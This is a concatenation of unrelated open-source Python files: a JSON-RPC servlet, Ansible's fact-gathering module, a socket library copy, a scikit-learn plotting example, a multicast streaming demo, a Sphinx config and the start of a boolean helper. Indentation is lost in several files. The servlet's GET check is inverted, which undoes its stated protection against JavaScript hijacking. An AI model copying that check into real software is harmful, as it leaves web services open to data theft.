# a vulnerability known as "JavaScript hijacking". See also:
# http://www.fortifysoftware.com/servlet/downloads/public/JavaScript_Hijacking.pdf
# http://ajaxian.com/archives/protecting-a-javascript-service
_allowGet = 0 # set to True if you want to allow GET requests
_allowEval = 0 # set to True to allow direct evaluation of the response
_encoding = 'utf-8' # set input str encoding
def __init__(self):
HTTPContent.__init__(self)
def respondToGet(self, transaction):
if self._allowGet:
self.writeError("GET method not allowed")
HTTPContent.respondToGet(self, transaction)
def defaultAction(self):
self.jsonCall()
def actions(self):
actions = HTTPContent.actions(self)
actions.append('jsonCall')
return actions
def exposedMethods(self):
return []
def writeError(self, msg):
self.write(simplejson.dumps({'id': self._id, 'code': -1, 'error': msg}, encoding=self._encoding))
def writeResult(self, data):
if DEBUG:
self._check(data)
data = simplejson.dumps({'id': self._id, 'result': data}, encoding=self._encoding)
if not self._allowEval:
data = 'throw new Error' \
'("Direct evaluation not allowed");\n/*%s*/' % (data,)
self.write(data)
def jsonCall(self):
"""Execute method with arguments on the server side.
Returns Javascript function to be executed by the client immediately.
"""
request = self.request()
data = simplejson.loads(request.rawInput().read(), encoding=self._encoding)
self._id, call, params = data["id"], data["method"], data["params"]
if call == 'system.listMethods':
self.writeResult(self.exposedMethods())
elif call in self.exposedMethods():
try:
method = getattr(self, call)
except AttributeError:
self.writeError('%s, although an approved method, '
'was not found' % call)
else:
try:
if self._debug:
self.log("json call %s(%s)" % (call, params))
self.writeResult(method(*params))
except Exception:
err = StringIO()
traceback.print_exc(file=err)
e = err.getvalue()
self.writeError('%s was called, '
'but encountered an error: %s' % (call, e))
err.close()
else:
self.writeError('%s is not an approved method' % call)
def _check(self, o):
if o is None:
pass
elif isinstance(o, dict):
self._check_dict(o)
elif isinstance(o, (list, tuple)):
self._check_list(o)
elif isinstance(o, str):
try:
unicode(o)
except:
raise RuntimeError, u"str value %s cannot be coerced to unicode" % repr(o)
elif isinstance(o, (int, long, float, unicode)):
pass
else:
raise RuntimeError, 'Unknown type: %s (value: %s)' % (type(o), repr(o))
def _check_dict(self, d):
print ">>> check dict"
for k, v in d.iteritems():
print '>>>', k, repr(v)
self._check(k)
self._check(v)
def _check_list(self, l):
print ">>> check list"
for v in l:
print '>>>', v
self._check(v)
| gpl-2.0 |
puzan/ansible | lib/ansible/modules/system/setup.py | 16 | 5737 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
---
module: setup
version_added: historical
short_description: Gathers facts about remote hosts
options:
gather_subset:
version_added: "2.1"
description:
- "if supplied, restrict the additional facts collected to the given subset.
Possible values: all, hardware, network, virtual, ohai, and
facter Can specify a list of values to specify a larger subset.
Values can also be used with an initial C(!) to specify that
that specific subset should not be collected. For instance:
!hardware, !network, !virtual, !ohai, !facter. Note that a few
facts are always collected. Use the filter parameter if you do
not want to display those."
required: false
default: 'all'
gather_timeout:
version_added: "2.2"
description:
- "Set the default timeout in seconds for individual fact gathering"
required: false
default: 10
filter:
version_added: "1.1"
description:
- if supplied, only return facts that match this shell-style (fnmatch) wildcard.
required: false
default: '*'
fact_path:
version_added: "1.3"
description:
- path used for local ansible facts (*.fact) - files in this dir
will be run (if executable) and their results be added to ansible_local facts
if a file is not executable it is read. Check notes for Windows options. (from 2.1 on)
File/results format can be json or ini-format
required: false
default: '/etc/ansible/facts.d'
description:
- This module is automatically called by playbooks to gather useful
variables about remote hosts that can be used in playbooks. It can also be
executed directly by C(/usr/bin/ansible) to check what variables are
available to a host. Ansible provides many I(facts) about the system,
automatically.
notes:
- More ansible facts will be added with successive releases. If I(facter) or
I(ohai) are installed, variables from these programs will also be snapshotted
into the JSON file for usage in templating. These variables are prefixed
with C(facter_) and C(ohai_) so it's easy to tell their source. All variables are
bubbled up to the caller. Using the ansible facts and choosing to not
install I(facter) and I(ohai) means you can avoid Ruby-dependencies on your
remote systems. (See also M(facter) and M(ohai).)
- The filter option filters only the first level subkey below ansible_facts.
- If the target host is Windows, you will not currently have the ability to use
C(filter) as this is provided by a simpler implementation of the module.
- If the target host is Windows you can now use C(fact_path). Make sure that this path
exists on the target host. Files in this path MUST be PowerShell scripts (``*.ps1``) and
their output must be formattable in JSON (Ansible will take care of this). Test the
output of your scripts.
This option was added in Ansible 2.1.
author:
- "Ansible Core Team"
- "Michael DeHaan"
- "David O'Brien @david_obrien davidobrien1985"
'''
EXAMPLES = """
# Display facts from all hosts and store them indexed by I(hostname) at C(/tmp/facts).
# ansible all -m setup --tree /tmp/facts
# Display only facts regarding memory found by ansible on all hosts and output them.
# ansible all -m setup -a 'filter=ansible_*_mb'
# Display only facts returned by facter.
# ansible all -m setup -a 'filter=facter_*'
# Display only facts about certain interfaces.
# ansible all -m setup -a 'filter=ansible_eth[0-2]'
# Restrict additional gathered facts to network and virtual.
# ansible all -m setup -a 'gather_subset=network,virtual'
# Do not call puppet facter or ohai even if present.
# ansible all -m setup -a 'gather_subset=!facter,!ohai'
# Only collect the minimum amount of facts:
# ansible all -m setup -a 'gather_subset=!all'
# Display facts from Windows hosts with custom facts stored in C(C:\\custom_facts).
# ansible windows -m setup -a "fact_path='c:\\custom_facts'"
"""
def main():
    """Ansible module entry point: gather facts and return them.

    Declares the module's accepted parameters (gather_subset,
    gather_timeout, filter, fact_path), collects the facts and hands them
    back to Ansible via exit_json.
    """
    module = AnsibleModule(
        argument_spec = dict(
            gather_subset=dict(default=["all"], required=False, type='list'),
            gather_timeout=dict(default=10, required=False, type='int'),
            filter=dict(default="*", required=False),
            fact_path=dict(default='/etc/ansible/facts.d', required=False, type='path'),
        ),
        # Fact gathering is read-only, so check mode is always safe.
        supports_check_mode = True,
    )
    data = get_all_facts(module)
    module.exit_json(**data)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.facts import *
if __name__ == '__main__':
main()
| gpl-3.0 |
methoxid/micropystat | tests/bytecode/pylib-tests/socket.py | 22 | 14915 | # Wrapper module for _socket, providing some additional facilities
# implemented in Python.
"""\
This module provides socket operations and some related functions.
On Unix, it supports IP (Internet Protocol) and Unix domain sockets.
On other systems, it only supports IP. Functions specific for a
socket are available as methods of the socket object.
Functions:
socket() -- create a new socket object
socketpair() -- create a pair of new socket objects [*]
fromfd() -- create a socket object from an open file descriptor [*]
fromshare() -- create a socket object from data received from socket.share() [*]
gethostname() -- return the current hostname
gethostbyname() -- map a hostname to its IP number
gethostbyaddr() -- map an IP number or hostname to DNS info
getservbyname() -- map a service name and a protocol name to a port number
getprotobyname() -- map a protocol name (e.g. 'tcp') to a number
ntohs(), ntohl() -- convert 16, 32 bit int from network to host byte order
htons(), htonl() -- convert 16, 32 bit int from host to network byte order
inet_aton() -- convert IP addr string (123.45.67.89) to 32-bit packed format
inet_ntoa() -- convert 32-bit packed format IP to string (123.45.67.89)
socket.getdefaulttimeout() -- get the default timeout value
socket.setdefaulttimeout() -- set the default timeout value
create_connection() -- connects to an address, with an optional timeout and
optional source address.
[*] not available on all platforms!
Special objects:
SocketType -- type object for socket objects
error -- exception raised for I/O errors
has_ipv6 -- boolean value indicating if IPv6 is supported
Integer constants:
AF_INET, AF_UNIX -- socket domains (first argument to socket() call)
SOCK_STREAM, SOCK_DGRAM, SOCK_RAW -- socket types (second argument)
Many other constants may be defined; these may be used in calls to
the setsockopt() and getsockopt() methods.
"""
import _socket
from _socket import *
import os, sys, io
try:
import errno
except ImportError:
errno = None
EBADF = getattr(errno, 'EBADF', 9)
EAGAIN = getattr(errno, 'EAGAIN', 11)
EWOULDBLOCK = getattr(errno, 'EWOULDBLOCK', 11)
__all__ = ["getfqdn", "create_connection"]
__all__.extend(os._get_exports_list(_socket))
_realsocket = socket
# WSA error codes
if sys.platform.lower().startswith("win"):
    # Map Winsock (WSA*) error numbers to human-readable messages;
    # only defined (and exported) on Windows platforms.
    errorTab = {}
    errorTab[10004] = "The operation was interrupted."  # WSAEINTR
    errorTab[10009] = "A bad file handle was passed."  # WSAEBADF
    errorTab[10013] = "Permission denied."  # WSAEACCES
    errorTab[10014] = "A fault occurred on the network??" # WSAEFAULT
    errorTab[10022] = "An invalid operation was attempted."  # WSAEINVAL
    errorTab[10035] = "The socket operation would block"  # WSAEWOULDBLOCK
    errorTab[10036] = "A blocking operation is already in progress."  # WSAEINPROGRESS
    errorTab[10048] = "The network address is in use."  # WSAEADDRINUSE
    errorTab[10054] = "The connection has been reset."  # WSAECONNRESET
    errorTab[10058] = "The network has been shut down."  # WSAESHUTDOWN
    errorTab[10060] = "The operation timed out."  # WSAETIMEDOUT
    errorTab[10061] = "Connection refused."  # WSAECONNREFUSED
    errorTab[10063] = "The name is too long."  # WSAENAMETOOLONG
    errorTab[10064] = "The host is down."  # WSAEHOSTDOWN
    errorTab[10065] = "The host is unreachable."  # WSAEHOSTUNREACH
    __all__.append("errorTab")
class socket(_socket.socket):

    """A subclass of _socket.socket adding the makefile() method."""

    __slots__ = ["__weakref__", "_io_refs", "_closed"]

    def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, fileno=None):
        _socket.socket.__init__(self, family, type, proto, fileno)
        # Number of SocketIO objects currently referencing this socket;
        # the underlying fd is only released once this drops to zero.
        self._io_refs = 0
        self._closed = False

    def __enter__(self):
        return self

    def __exit__(self, *args):
        if not self._closed:
            self.close()

    def __repr__(self):
        """Wrap __repr__() to reveal the real class name."""
        s = _socket.socket.__repr__(self)
        if s.startswith("<socket object"):
            s = "<%s.%s%s%s" % (self.__class__.__module__,
                                self.__class__.__name__,
                                getattr(self, '_closed', False) and " [closed] " or "",
                                s[7:])
        return s

    def __getstate__(self):
        raise TypeError("Cannot serialize socket object")

    def dup(self):
        """dup() -> socket object

        Return a new socket object connected to the same system resource.
        """
        fd = dup(self.fileno())
        sock = self.__class__(self.family, self.type, self.proto, fileno=fd)
        sock.settimeout(self.gettimeout())
        return sock

    def accept(self):
        """accept() -> (socket object, address info)

        Wait for an incoming connection.  Return a new socket
        representing the connection, and the address of the client.
        For IP sockets, the address info is a pair (hostaddr, port).
        """
        fd, addr = self._accept()
        sock = socket(self.family, self.type, self.proto, fileno=fd)
        # Issue #7995: if no default timeout is set and the listening
        # socket had a (non-zero) timeout, force the new socket in blocking
        # mode to override platform-specific socket flags inheritance.
        if getdefaulttimeout() is None and self.gettimeout():
            sock.setblocking(True)
        return sock, addr

    def makefile(self, mode="r", buffering=None, *,
                 encoding=None, errors=None, newline=None):
        """makefile(...) -> an I/O stream connected to the socket

        The arguments are as for io.open() after the filename,
        except the only mode characters supported are 'r', 'w' and 'b'.
        The semantics are similar too.  (XXX refactor to share code?)
        """
        for c in mode:
            # BUG FIX: compare against the literal set {"r", "w", "b"};
            # the original referenced an undefined name (`a+"r"`) and
            # raised NameError instead of ValueError.  Also actually
            # %-format the offending mode into the message.
            if c not in {"r", "w", "b"}:
                raise ValueError("invalid mode %r (only r, w, b allowed)" % (mode,))
        writing = "w" in mode
        reading = "r" in mode or not writing
        assert reading or writing
        binary = "b" in mode
        rawmode = ""
        if reading:
            rawmode += "r"
        if writing:
            rawmode += "w"
        raw = SocketIO(self, rawmode)
        self._io_refs += 1
        if buffering is None:
            buffering = -1
        if buffering < 0:
            buffering = io.DEFAULT_BUFFER_SIZE
        if buffering == 0:
            if not binary:
                raise ValueError("unbuffered streams must be binary")
            return raw
        if reading and writing:
            buffer = io.BufferedRWPair(raw, raw, buffering)
        elif reading:
            buffer = io.BufferedReader(raw, buffering)
        else:
            assert writing
            buffer = io.BufferedWriter(raw, buffering)
        if binary:
            return buffer
        text = io.TextIOWrapper(buffer, encoding, errors, newline)
        text.mode = mode
        return text

    def _decref_socketios(self):
        # Called by SocketIO.close(); performs the deferred close once the
        # last I/O wrapper is gone.
        if self._io_refs > 0:
            self._io_refs -= 1
        if self._closed:
            self.close()

    def _real_close(self, _ss=_socket.socket):
        # This function should not reference any globals. See issue #808164.
        _ss.close(self)

    def close(self):
        # This function should not reference any globals. See issue #808164.
        self._closed = True
        if self._io_refs <= 0:
            self._real_close()

    def detach(self):
        """detach() -> file descriptor

        Close the socket object without closing the underlying file descriptor.
        The object cannot be used after this call, but the file descriptor
        can be reused for other purposes.  The file descriptor is returned.
        """
        self._closed = True
        return super().detach()
def fromfd(fd, family, type, proto=0):
""" fromfd(fd, family, type[, proto]) -> socket object
Create a socket object from a duplicate of the given file
descriptor. The remaining arguments are the same as for socket().
"""
nfd = dup(fd)
return socket(family, type, proto, nfd)
if hasattr(_socket.socket, "share"):
    # socket.share() (and therefore fromshare) only exists on Windows.
    def fromshare(info):
        """ fromshare(info) -> socket object

        Create a socket object from the bytes object returned by
        socket.share(pid).
        """
        return socket(0, 0, 0, info)
if hasattr(_socket, "socketpair"):

    def socketpair(family=None, type=SOCK_STREAM, proto=0):
        """socketpair([family[, type[, proto]]]) -> (socket object, socket object)

        Create a pair of socket objects from the sockets returned by the platform
        socketpair() function.
        The arguments are the same as for socket() except the default family is
        AF_UNIX if defined on the platform; otherwise, the default is AF_INET.
        """
        if family is None:
            try:
                family = AF_UNIX
            except NameError:
                # Platform without AF_UNIX (e.g. Windows): fall back to AF_INET.
                family = AF_INET
        a, b = _socket.socketpair(family, type, proto)
        # Re-wrap the low-level sockets in this module's socket class,
        # detaching the fds from the temporary _socket.socket objects.
        a = socket(family, type, proto, a.detach())
        b = socket(family, type, proto, b.detach())
        return a, b
_blocking_errnos = { EAGAIN, EWOULDBLOCK }
class SocketIO(io.RawIOBase):
"""Raw I/O implementation for stream sockets.
This class supports the makefile() method on sockets. It provides
the raw I/O interface on top of a socket object.
"""
# One might wonder why not let FileIO do the job instead. There are two
# main reasons why FileIO is not adapted:
# - it wouldn't work under Windows (where you can't used read() and
# write() on a socket handle)
# - it wouldn't work with socket timeouts (FileIO would ignore the
# timeout and consider the socket non-blocking)
# XXX More docs
def __init__(self, sock, mode):
if mode not in ("r", "w", "rw", "rb", "wb", "rwb"):
raise ValueError("invalid mode: %r" % mode)
io.RawIOBase.__init__(self)
self._sock = sock
if "b" not in mode:
mode += "b"
self._mode = mode
self._reading = "r" in mode
self._writing = "w" in mode
self._timeout_occurred = False
def readinto(self, b):
"""Read up to len(b) bytes into the writable buffer *b* and return
the number of bytes read. If the socket is non-blocking and no bytes
are available, None is returned.
If *b* is non-empty, a 0 return value indicates that the connection
was shutdown at the other end.
"""
self._checkClosed()
self._checkReadable()
if self._timeout_occurred:
raise IOError("cannot read from timed out object")
while True:
try:
return self._sock.recv_into(b)
except timeout:
self._timeout_occurred = True
raise
except InterruptedError:
continue
except error as e:
if e.args[0] in _blocking_errnos:
return None
raise
def write(self, b):
"""Write the given bytes or bytearray object *b* to the socket
and return the number of bytes written. This can be less than
len(b) if not all data could be written. If the socket is
non-blocking and no bytes could be written None is returned.
"""
self._checkClosed()
self._checkWritable()
try:
return self._sock.send(b)
except error as e:
# XXX what about EINTR?
if e.args[0] in _blocking_errnos:
return None
raise
def readable(self):
"""True if the SocketIO is open for reading.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return self._reading
def writable(self):
"""True if the SocketIO is open for writing.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return self._writing
def seekable(self):
"""True if the SocketIO is open for seeking.
"""
if self.closed:
raise ValueError("I/O operation on closed socket.")
return super().seekable()
def fileno(self):
"""Return the file descriptor of the underlying socket.
"""
self._checkClosed()
return self._sock.fileno()
@property
def name(self):
if not self.closed:
return self.fileno()
else:
return -1
    @property
    def mode(self):
        """The normalized (always binary) mode string this SocketIO was opened with."""
        return self._mode
def close(self):
"""Close the SocketIO object. This doesn't close the underlying
socket, except if all references to it have disappeared.
"""
if self.closed:
return
io.RawIOBase.close(self)
self._sock._decref_socketios()
self._sock = None
def getfqdn(name=''):
    """Return the fully qualified domain name for *name*.

    An empty name (or '0.0.0.0') is interpreted as the local host.  The
    hostname reported by gethostbyaddr() and its aliases are scanned for
    the first entry containing a dot; if the lookup fails the stripped
    input is returned unchanged, and if no dotted entry exists the bare
    hostname from the lookup is returned.
    """
    name = name.strip()
    if name in ('', '0.0.0.0'):
        name = gethostname()
    try:
        hostname, aliases, ipaddrs = gethostbyaddr(name)
    except error:
        # Resolution failed; fall back to whatever we were given.
        return name
    for candidate in [hostname] + aliases:
        if '.' in candidate:
            return candidate
    return hostname
_GLOBAL_DEFAULT_TIMEOUT = object()
def create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT,
                      source_address=None):
    """Connect to *address* and return the socket object.

    *address* is a 2-tuple ``(host, port)``.  Each address family
    returned by getaddrinfo() is tried in turn until one connects.  The
    optional *timeout* is applied to the socket before connecting; when
    omitted, the global default from getdefaulttimeout() applies.  If
    *source_address* is given it must be a ``(host, port)`` tuple to
    bind as the source address ('' or port 0 means the OS default).
    Raises the last socket error when every candidate fails, or a plain
    error when getaddrinfo() yields nothing at all.
    """
    host, port = address
    last_error = None
    for af, socktype, proto, canonname, sa in getaddrinfo(host, port, 0, SOCK_STREAM):
        sock = None
        try:
            sock = socket(af, socktype, proto)
            if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
                sock.settimeout(timeout)
            if source_address:
                sock.bind(source_address)
            sock.connect(sa)
            return sock
        except error as exc:
            last_error = exc
            # Clean up the half-constructed socket before trying the
            # next candidate address.
            if sock is not None:
                sock.close()
    if last_error is None:
        raise error("getaddrinfo returns an empty list")
    raise last_error
| mit |
ilo10/scikit-learn | examples/plot_johnson_lindenstrauss_bound.py | 134 | 7452 | """
=====================================================================
The Johnson-Lindenstrauss bound for embedding with random projections
=====================================================================
The `Johnson-Lindenstrauss lemma`_ states that any high dimensional
dataset can be randomly projected into a lower dimensional Euclidean
space while controlling the distortion in the pairwise distances.
.. _`Johnson-Lindenstrauss lemma`: http://en.wikipedia.org/wiki/Johnson%E2%80%93Lindenstrauss_lemma
Theoretical bounds
==================
The distortion introduced by a random projection `p` is asserted by
the fact that `p` is defining an eps-embedding with good probability
as defined by:
(1 - eps) ||u - v||^2 < ||p(u) - p(v)||^2 < (1 + eps) ||u - v||^2
Where u and v are any rows taken from a dataset of shape [n_samples,
n_features] and p is a projection by a random Gaussian N(0, 1) matrix
with shape [n_components, n_features] (or a sparse Achlioptas matrix).
The minimum number of components to guarantee the eps-embedding is
given by:
n_components >= 4 log(n_samples) / (eps^2 / 2 - eps^3 / 3)
The first plot shows that with an increasing number of samples ``n_samples``,
the minimal number of dimensions ``n_components`` increased logarithmically
in order to guarantee an ``eps``-embedding.
The second plot shows that an increase of the admissible
distortion ``eps`` makes it possible to drastically reduce the minimal number of
dimensions ``n_components`` for a given number of samples ``n_samples``
Empirical validation
====================
We validate the above bounds on the digits dataset or on the 20 newsgroups
text document (TF-IDF word frequencies) dataset:
- for the digits dataset, some 8x8 gray level pixels data for 500
handwritten digits pictures are randomly projected to spaces for various
larger number of dimensions ``n_components``.
- for the 20 newsgroups dataset some 500 documents with 100k
features in total are projected using a sparse random matrix to smaller
euclidean spaces with various values for the target number of dimensions
``n_components``.
The default dataset is the digits dataset. To run the example on the twenty
newsgroups dataset, pass the --twenty-newsgroups command line argument to this
script.
For each value of ``n_components``, we plot:
- 2D distribution of sample pairs with pairwise distances in original
and projected spaces as x and y axis respectively.
- 1D histogram of the ratio of those distances (projected / original).
We can see that for low values of ``n_components`` the distribution is wide
with many distorted pairs and a skewed distribution (due to the hard
limit of zero ratio on the left as distances are always positives)
while for larger values of n_components the distortion is controlled
and the distances are well preserved by the random projection.
Remarks
=======
According to the JL lemma, projecting 500 samples without too much distortion
will require at least several thousands dimensions, irrespective of the
number of features of the original dataset.
Hence using random projections on the digits dataset which only has 64 features
in the input space does not make sense: it does not allow for dimensionality
reduction in this case.
On the twenty newsgroups on the other hand the dimensionality can be decreased
from 56436 down to 10000 while reasonably preserving pairwise distances.
"""
print(__doc__)
import sys
from time import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn.random_projection import johnson_lindenstrauss_min_dim
from sklearn.random_projection import SparseRandomProjection
from sklearn.datasets import fetch_20newsgroups_vectorized
from sklearn.datasets import load_digits
from sklearn.metrics.pairwise import euclidean_distances
# Part 1: plot the theoretical dependency between n_components_min and
# n_samples
# range of admissible distortions
eps_range = np.linspace(0.1, 0.99, 5)
# one color per eps value, darker shades for larger eps
colors = plt.cm.Blues(np.linspace(0.3, 1.0, len(eps_range)))
# range of number of samples (observation) to embed
n_samples_range = np.logspace(1, 9, 9)
plt.figure()
# one curve per admissible distortion: the minimal n_components needed
# to eps-embed a growing number of samples (log-log scale)
for eps, color in zip(eps_range, colors):
    min_n_components = johnson_lindenstrauss_min_dim(n_samples_range, eps=eps)
    plt.loglog(n_samples_range, min_n_components, color=color)
plt.legend(["eps = %0.1f" % eps for eps in eps_range], loc="lower right")
plt.xlabel("Number of observations to eps-embed")
plt.ylabel("Minimum number of dimensions")
plt.title("Johnson-Lindenstrauss bounds:\nn_samples vs n_components")
# range of admissible distortions
eps_range = np.linspace(0.01, 0.99, 100)
# range of number of samples (observation) to embed
n_samples_range = np.logspace(2, 6, 5)
colors = plt.cm.Blues(np.linspace(0.3, 1.0, len(n_samples_range)))
plt.figure()
# second figure: for fixed sample counts, how the required n_components
# shrinks as the tolerated distortion eps grows (semi-log scale)
for n_samples, color in zip(n_samples_range, colors):
    min_n_components = johnson_lindenstrauss_min_dim(n_samples, eps=eps_range)
    plt.semilogy(eps_range, min_n_components, color=color)
plt.legend(["n_samples = %d" % n for n in n_samples_range], loc="upper right")
plt.xlabel("Distortion eps")
plt.ylabel("Minimum number of dimensions")
plt.title("Johnson-Lindenstrauss bounds:\nn_components vs eps")
# Part 2: perform sparse random projection of some digits images which are
# quite low dimensional and dense or documents of the 20 newsgroups dataset
# which is both high dimensional and sparse
if '--twenty-newsgroups' in sys.argv:
    # Need an internet connection hence not enabled by default
    data = fetch_20newsgroups_vectorized().data[:500]
else:
    data = load_digits().data[:500]
n_samples, n_features = data.shape
print("Embedding %d samples with dim %d using various random projections"
      % (n_samples, n_features))
# target dimensionalities to project onto
n_components_range = np.array([300, 1000, 10000])
# squared pairwise distances in the original space, flattened
dists = euclidean_distances(data, squared=True).ravel()
# select only non-identical samples pairs
nonzero = dists != 0
dists = dists[nonzero]
# For each target dimensionality: project the data, then compare pairwise
# squared distances before and after projection (2-D density plot plus a
# histogram of the projected/original distance ratios).
for n_components in n_components_range:
    t0 = time()
    rp = SparseRandomProjection(n_components=n_components)
    projected_data = rp.fit_transform(data)
    print("Projected %d samples from %d to %d in %0.3fs"
          % (n_samples, n_features, n_components, time() - t0))
    if hasattr(rp, 'components_'):
        # Report the memory footprint of the sparse projection matrix.
        n_bytes = rp.components_.data.nbytes
        n_bytes += rp.components_.indices.nbytes
        print("Random matrix with size: %0.3fMB" % (n_bytes / 1e6))
    # pairwise squared distances in the projected space, for the same
    # non-identical sample pairs selected above
    projected_dists = euclidean_distances(
        projected_data, squared=True).ravel()[nonzero]
    plt.figure()
    plt.hexbin(dists, projected_dists, gridsize=100, cmap=plt.cm.PuBu)
    plt.xlabel("Pairwise squared distances in original space")
    plt.ylabel("Pairwise squared distances in projected space")
    plt.title("Pairwise distances distribution for n_components=%d" %
              n_components)
    cb = plt.colorbar()
    cb.set_label('Sample pairs counts')
    rates = projected_dists / dists
    print("Mean distances rate: %0.2f (%0.2f)"
          % (np.mean(rates), np.std(rates)))
    plt.figure()
    # ``normed`` was deprecated in matplotlib 2.1 and removed in 3.1;
    # ``density=True`` is the equivalent normalized-histogram option.
    plt.hist(rates, bins=50, density=True, range=(0., 2.))
    plt.xlabel("Squared distances rate: projected / original")
    plt.ylabel("Distribution of samples pairs")
    plt.title("Histogram of pairwise distance rates for n_components=%d" %
              n_components)
# TODO: compute the expected value of eps and add them to the previous plot
# as vertical lines / region
plt.show()
| bsd-3-clause |
bbc/kamaelia | Sketches/MPS/BugReports/FixTests/Kamaelia/Examples/Multicast/BasicSystems/MulticastStreamingSystem.py | 6 | 1623 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Basic acceptance test harness for the Multicast_sender and receiver
# components.
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from Kamaelia.File.ReadFileAdaptor import ReadFileAdaptor
from Kamaelia.Codec.Vorbis import VorbisDecode, AOAudioPlaybackAdaptor
from Kamaelia.Internet.Multicast_transceiver import Multicast_transceiver
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Util.Detuple import SimpleDetupler
# Ogg Vorbis file that the server streams to the client over multicast.
file_to_stream = "../../SupportingMediaFiles/KDE_Startup_2.ogg"

# Server: read the file at a steady bitrate and push the chunks onto the
# multicast group 224.168.2.9:1600.
server = Pipeline(
    ReadFileAdaptor(file_to_stream, readmode="bitrate", bitrate=400000, chunkrate=50),
    Multicast_transceiver("0.0.0.0", 0, "224.168.2.9", 1600),
)
server.activate()

# Client: receive tuples from the multicast group, keep only element 1 of
# each tuple (presumably the payload of a (source, data) pair -- verify
# against Multicast_transceiver), decode the Vorbis stream and play it.
client = Pipeline(
    Multicast_transceiver("0.0.0.0", 1600, "224.168.2.9", 0),
    SimpleDetupler(1),
    VorbisDecode(),
    AOAudioPlaybackAdaptor(),
)
client.run()
| apache-2.0 |
kevenli/scrapydd | docs/conf.py | 1 | 10111 | # -*- coding: utf-8 -*-
#
# Sphinx configuration for the scrapydd documentation.
#
# Originally generated by sphinx-quickstart; trimmed down to the options
# that are actually set.  See
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# for every available value and its default.

# -- General configuration ------------------------------------------------

# No Sphinx extensions are needed to build these docs.
extensions = []

# Paths (relative to this directory) that contain templates.
templates_path = ['_templates']

# Source file suffix and the master ("root") document.
source_suffix = '.rst'
master_doc = 'index'

# -- Project information --------------------------------------------------

project = u'scrapydd'
copyright = u'2020, kevenli'
author = u'kevenli'

# The short X.Y version and the full release string; update both together
# on release.
version = u'0.7.5'
release = u'0.7.5'

# Language for generated text.  Sphinx 5 dropped support for None here
# (it warned and fell back to English), so declare English explicitly.
language = 'en'

# Patterns, relative to the source directory, to ignore when looking for
# source files.  These also affect html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# Pygments (syntax highlighting) style for code blocks.
pygments_style = 'sphinx'

# Do not render `todo` / `todoList` directives in the output.
todo_include_todos = False

# -- Options for HTML output ----------------------------------------------

# Use the Read the Docs theme.
html_theme = 'sphinx_rtd_theme'

# Custom static files (copied after the builtin ones, so a file named
# "default.css" here would override the theme's).
html_static_path = ['_static']

# Output file base name for the HTML help builder.
htmlhelp_basename = 'scrapydddoc'

# -- Options for LaTeX output ---------------------------------------------

# All LaTeX options are left at their defaults.
latex_elements = {
}

# Grouping of the document tree into LaTeX files:
# (source start file, target name, title, author, documentclass).
latex_documents = [
    (master_doc, 'scrapydd.tex', u'scrapydd Documentation',
     u'kevenli', 'manual'),
]

# -- Options for manual page output ---------------------------------------

# One entry per manual page:
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'scrapydd', u'scrapydd Documentation',
     [author], 1)
]

# -- Options for Texinfo output -------------------------------------------

# (source start file, target name, title, author, dir menu entry,
#  description, category).
texinfo_documents = [
    (master_doc, 'scrapydd', u'scrapydd Documentation',
     author, 'scrapydd', 'One line description of project.',
     'Miscellaneous'),
]
| apache-2.0 |
netvigator/myPyPacks | DbApi/Boolean.py | 2 | 3440 | #!/usr/bin/pythonTest
# -*- coding: utf-8 -*-
#
# DbApi functions Boolean
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# The GNU General Public License is available from:
# The Free Software Foundation, Inc.
# 51 Franklin Street, Fifth Floor
# Boston MA 02110-1301 USA
#
# http://www.gnu.org/licenses/gpl.html
#
# Copyright 2004-2016 Rick Graves
#
# Accepted spellings (lower-cased, quotes stripped) of boolean values.
setBooleanTrue = frozenset( ( 't', 'true', 'y', 'yes', '1' ) )
setBooleanFalse = frozenset( ( 'f', 'false', 'n', 'no', '0' ) )
from Utils.Both2n3 import setNumberTypes
# SQL boolean literals indexed by truth value: tBooleansSQL[int(bool)].
tBooleansSQL = ( 'FALSE', 'TRUE' )
# True when u is exactly one of the project's numeric types (exact type
# match -- subclasses are not considered).
def _isNumber( u ): return type( u ) in setNumberTypes
def getBooleanInteger( uValue, bDebug = 1 ):
    """Map a boolean-ish value onto the integer 1 (true) or 0 (false).

